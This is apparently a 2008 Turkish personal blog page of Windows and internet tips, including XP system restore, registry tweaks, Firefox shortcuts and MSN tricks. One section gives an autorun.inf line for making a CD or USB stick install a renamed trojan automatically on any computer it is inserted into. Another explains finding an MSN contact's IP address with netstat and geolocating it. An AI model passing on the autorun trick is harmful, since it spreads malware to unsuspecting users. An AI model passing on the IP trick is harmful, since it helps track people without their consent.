3 Ağustos 2008 Pazar

Windows XP yi Onarmak

Windows XP yüklü bilgisayarı restore etmek...arkadaşlar windows XP kullananlar herhangibir sebepten dolayı açılmaz veya açtığınız site değilde başka sitelere sizi atyorsa bilgisayarınız spam vede dialelerden zarar görmüştür bunu en iyisi bilgisayarınızı restore etmeyle başlayın

BİLGİSAYARINIZI BAŞLATTIKTAN SONRA WİNDOWS LOGOSU EKRANDA GÖRÜNMEDEN ÖNCE F5 DÜĞMESİNE BASIN GÜVENLİ KİP KOMUT İSTEMİ (safe mode with command prompt )SEÇENEĞİNİ ÇALIŞTIRIN.WİNDOWS OTURUMUNU SİSTEM YÖNETİCİSİ OLARAK AÇMANIZ GEREKECEKTİR.BUNU YAPTIKTAN SONRA KARŞINIZA DOS KOMUT PENCERESİGELİR BOŞ SATIRA %systemroot%\system32\restore\ rstrui.exe KOMUTUNUYAZIP ENTER E BAS VE SİSTEM GERİ YÜKLENECEKTİRbilgisayarınız düzelmiş olacaktır kolay gelsin arkadaşlar

Internet Explorer 7'deki arama çubuğunu kaldırmak

Notepad'i açın ve aşağıdaki kodu kopyalayıp yapıştırın.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]"NoSearchBox"=dword:00000001

Farklı Kaydet'i seçin ve uzantısı .reg olacak şekilde bir isim verin, örneğin ie7_arama.reg Kaydettiğiniz ie7_arama.reg dosyasına çift tıklayın ve kayıt defterine ekleyin. Internet Explorer açıksa kapatıp yeniden açın.

Arama çubuğu kaldırıldı!
Arama çubuğunun tekrar görünmesini isterseniz kodu aşağıdaki gibi değiştirin.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]"NoSearchBox"=dword:00000000

CD-DVD-FLASH VB lere tak calıstır vırusu koymak

[Autorun]open=server.exe
işte bunları bir not defterine yazıp ondan sonra da autorun.inf diye kaydediosunuzsonra bir virüs veya trojan ne ise artık adını server yapıp (genelde server dir zaten) Cd nin içine kopyalıyosunuz artık o cd takıldığı bilgisayara serveri yükler konumdadır ... Bazılarınız için basit gelebilir ama çoğu arkadaş bilmiodur ... Belkide biliodur nese...

Firefox İpucuları

İpucu: Sekme çubuğunun boş kısmına 2 defa tıklayarak yeni bir sekme oluşturabilirsiniz.
İpucu: Yerimlerinize farenin orta tuşu ile basarsanız yeni sekme’de açabilirsiniz.
İpucu: Yerimi klasörlerinize de farenin orta tuşu ile basarak klasörde bulunan bütün sayfaların yeni sekmelerde açılmasını sağlayabilirsiniz.
İpucu: Ctrl tuşuna basılı tutup bir bağlantıya tıklarsanız bağlantı yeni sekmede, Shift tuşuna basılı tutup bir bağlantıyı tıklarsanız bağlantı yeni pencerede açılacaktır.
İpucu: Kullanmadığınız menüleri userchrome.css dosyasını düzenleyerek kaldırabilirsiniz.
İpucu: Bir sekmeye farenin orta tuşu ile basarak o sekmenin kapanmasını sağlayabilirsiniz.
İpucu: Birden fazla anasayfa adresi oluşturmak için adresler arasına “” (pipe tuşu) koyun.
İpucu: Ctrl tuşu ve farenizin orta tuşunu aşağı/yukarı oynatarak sayfalardaki yazı karakterlerini büyütebilir veya küçültebilirsiniz.
İpucu: Kapattığınız bir sekmeyi geri almak için Sekme araç çubuğuna sağ tıklayıp “Sekme kapatma işlemini geri al” seçeneğini tıklayabilir veya Ctrl+Shift+T tuş kombinasyonuna basabilirsiniz.
İpucu: Eğer ziyaret ettiğiniz sayfalardan sadece bir kaç siteyi geçmiş bölümünden kaldırmak istiyorsanız, adres çubuğu üzerinden aşağı yukarı tuşları ile siteyi seçtikten sonra delete tuşuna basarak silebilirsiniz.
İpucu: Ctrl tuşu ve aşağı ve yukarı tuşlarını kullanarak arama bölümündeki arama motorunu değiştirebilirsiniz.
İpucu: Ctrl + L tuş kombinasyonuna basarak adres çubuğuna geçebilirsiniz.
İpucu: Ctrl + K tuş kombinasyonuna basarak arama çubuğuna geçebilirsiniz.
İpucu: Ctrl + Tab tuş kombinasyonuyla sonraki sekmeye, Ctrl + Shift + Tab tuşu ile önceki sekmeye geçiş yapabilirsiniz, Ctrl ve sekme numarasına basarak istediğiniz sekmeye geçebilirsiniz.
İpucu: Sayfanın sonunu görüntülemek için End tuşuna, Sayfanın başını görüntülemek için Home tuşuna basabilirsiniz.
İpucu: Ctrl + w tuş kombinasyonu ile aktif sekmeyi kapatabilirsiniz.
İpucu: Alt + Sol yön tuş kombinasyonu ile önceki sayfaya, Alt + Sağ yön tuşu ile sonraki sayfaya gidebilirsiniz.

Gmail Hesabını Kapatmak için

Gmail hesabını kapatmak için İ.E bömünün browser bölümünehttps://www.google.com/accounts/ServiceLoginAuth
bu linki yazın ve entere basın daha sonra çıkan menüden en aşağıda gmail hizmetini sile basın gmail hesabınız kapanacaktır.

Facebook u Türkçe Yapmak

www.facebook.com/translations Bu adrese gir Şimdi, sırasıyla aşağıdaki işlemleri yapalım. “Add Aplication”a tıklayarak uygulamamızı yükleyelim. Ardınan “Add Translations”a tıklayarak çeviri seçeneklerine adım atalım. Son olarak sağ taratftan diller arasından Türkçe'yi seçelim. Hepsi bu kadar. Facebook artık tamamen ve hiç bir eklenti kullanmadan Türkçe!

Vatana millete Hayırılı olsun... Kullan Türkiyem

Kayıt Defterinin Yedeğini Almak

kayıt defteri(registry) sistemin temel taşlarındandır.herhangi bir tersliğe karşı yedeğini bulundurmak yararınıza olacaktır.peki bunu nasıl yapacağız?

başlat>çalıştır>regedit yazıp enter'a basın.karşınıza registry editörü gelecektir."kayıt defteri" menüsüne tıklayın ve açılınca "kayıt defteri dosyası ver" tıklayın.

daha sonra açılan pencerede aşağıda "tümü" yazan yere tıklayın,dosya adını yazın,kaydetmek istediğiniz yeri seçin ve "kaydet" butonuna tıklayın.

not: kayıt defterini sistemin kurulu olduğu partition'a yedeklemeyin!çeşitli araçlar yardımı ile kayıt defteri hatalarını düzeltin!ayda bir kere kayıt defteri birleştirme(defrag) uygulayın!

Messenger Hileleri

Msn messenger da engellendinmi?

Araçlar Sekmesine Tıklıyoruz Daha Sonra Seçenekler i Seçiyoruz,Ondan Sonra da Gizlilik Seçiyoruz.Karşımıza İki Pencere Çıkıyor.Ekrana Önümüz Dönükken Sol Taraftaki Pencere de Sizin İzin Verilenler Listeniz Var.Orada İstediğiniz Kişinin Üzerinde Farenizin Sağ Tuşunu Tıklıyorsunuz,Eğer Sil Menüsü Etkinse Bu Kişi Sizi Engellemiş Demektir.Ama Etkin Değilse de Tam Aksidir,Engellememiştir. )

Bir İpucu Daha;Sizi Engellememiş,Fakat Sizi Kendi Listesinden Silip Silmediğini Nasıl Anlarsınız Onu Anlatayım.Şimdi Karşımızda İki Pencere Vardı.Onların Hemen Altında da Görüntüle Diye Bir Buton Var.Oraya Tıklıyorsunuz ve Karşınıza Başka Bir Pencere Çıkıyor.Eğer Burada O Aradaığınız Kişi Yoksa.Sizi Kişi Listesinden Silmiş Demektir.

MSN İÇİN İSİM YARATMAK

Hep merak ediyorduk. Msn'de garip garip harfler yapıyorlardı (Örneğin ; µ Æ × À Bunları Siz de yapabilirsiniz Meğersa cok kolaymıs
Baslat'a basın.. Sonra Çalıstırı Seçin Ve charmap yazın.. Tamam'a basın.. Ordan Olusturun

Msn'den Yer tespit etme..!
Msn'den Yer tespit etmede işinize Yarayabilir...
Başlat => çalıştır = > cmd => netstat -n => Dos ekranıMsn de konuşrken web cam açtırdıysan karşıya ,dosya gönderdiysen ,ses vb. yani bir alış veriş yaptıysan karşı tarafın ip adresini almış oluyoruz bunuda yıkarıda verdigim komutlarla yapıyoruz...Ip adresi bulmanın ayrıntıları sitede mevcut zaten.şimdi orda bir çok ip adresi çıkabilir sen diyceksin ki ben hangisinin hangisi oldugunu nerden bilecegim port yardımıyla bulabilirsin ben portları pek aklımda tutamam sanırım web camın ki 9046 tam hatırlamıyorum bu portları bulabilirsen daha kolay tespit edebilirsin ve ip adresni ögrendin http://www.ip2location.com/free.asp bu adresten ip adresini ordaki ekrana yazarak nerden oldugunu ögrenebilirsin

İpconfig Detayları

ipconfig - ip ayarlarini gösterir

ipconfig /all - ayrıntılı olarak gösterir.

ipconfig /flushdns - dns önbellegini temizler.

ipconfig /registerdns - dnse kaydın yapılmasını saglar.

ipconfig /release - dhcp den ip alıyorsa ip yi bırakır.

ipconfig /renew - dhcp den yeni ip alır.

ipconfig /displaydns - dns in önbelleginde bulunan kayıtları gösterir.

ipconfig /showclassid - dhcp de uyguladıgımız classidleri görürüz.

ipconfig /setclassid dhcp deki classid modifikasyonu .